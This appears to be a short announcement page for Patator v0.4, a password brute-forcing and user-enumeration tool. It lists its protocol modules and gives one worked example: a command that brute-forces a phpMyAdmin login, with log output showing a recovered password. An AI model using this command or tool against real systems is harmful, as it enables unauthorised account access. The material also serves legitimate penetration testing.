Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage and is NOT script-kiddie friendly.
Currently(v0.4) it supports the following modules:
* ftp_login : Brute-force FTP
* ssh_login : Brute-force SSH
* telnet_login : Brute-force Telnet
* smtp_login : Brute-force SMTP
* smtp_vrfy : Enumerate valid users using the SMTP VRFY command
* smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
* finger_lookup : Enumerate valid users using Finger
* http_fuzz : Brute-force HTTP/HTTPS
* pop_login : Brute-force POP
* pop_passd : Brute-force poppassd (not POP3)
* imap_login : Brute-force IMAP
* ldap_login : Brute-force LDAP
* smb_login : Brute-force SMB
* smb_lookupsid : Brute-force SMB SID-lookup
* vmauthd_login : Brute-force VMware Authentication Daemon
* mssql_login : Brute-force MSSQL
* oracle_login : Brute-force Oracle
* mysql_login : Brute-force MySQL
* mysql_query : Brute-force MySQL queries
* pgsql_login : Brute-force PostgreSQL
* vnc_login : Brute-force VNC
* dns_forward : Brute-force DNS
* dns_reverse : Brute-force DNS (reverse lookup subnets)
* snmp_login : Brute-force SNMPv1/2 and SNMPv3
* unzip_pass : Brute-force the password of encrypted ZIP files
* keystore_pass : Brute-force the password of Java keystore files
Usage example:
- HTTP : Brute-force phpMyAdmin logon
$ http_fuzz url=http://10.0.0.1/phpmyadmin/index.php method=POST body='pma_username=COMBO00
&pma_password=COMBO01&server=1&lang=en' 0=combos.txt follow=1 accept_cookie=1
-x ignore:fgrep='Cannot log in to the MySQL server' -l /tmp/qsdf
10:55:50 patator INFO - Starting Patator v0.4 (http://code.google.com/p/patator/) at 2012-06-29 10:55 EST
10:55:50 patator INFO - ---------------------------------------------------------------
10:55:50 patator INFO - code & size | candidate | num | mesg ..
10:55:50 patator INFO - ---------------------------------------------------------------
10:55:50 patator INFO - 200 8209:7075 | root: | 22 | HTTP/1.1 200 OK
10:55:51 patator INFO - 200 3838:2566 | root:p@ssw0rd | 44 | HTTP/1.1 200 OK
^C
10:55:52 patator INFO - Hits/Done/Size/Fail: 2/125/2342/0, Avg: 47 r/s, Time: 0h 0m 2s
10:55:52 patator INFO - To resume execution, pass --resume 12,13,12,13,12,12,13,13,13,12
Payload #22 was a false positive: $ cat /tmp/qsdf/22_200_8209\:7075.txt
...
<div class="error">Login without a password is forbidden by configuration (see AllowNoPassword)</div>
Download/Source: patator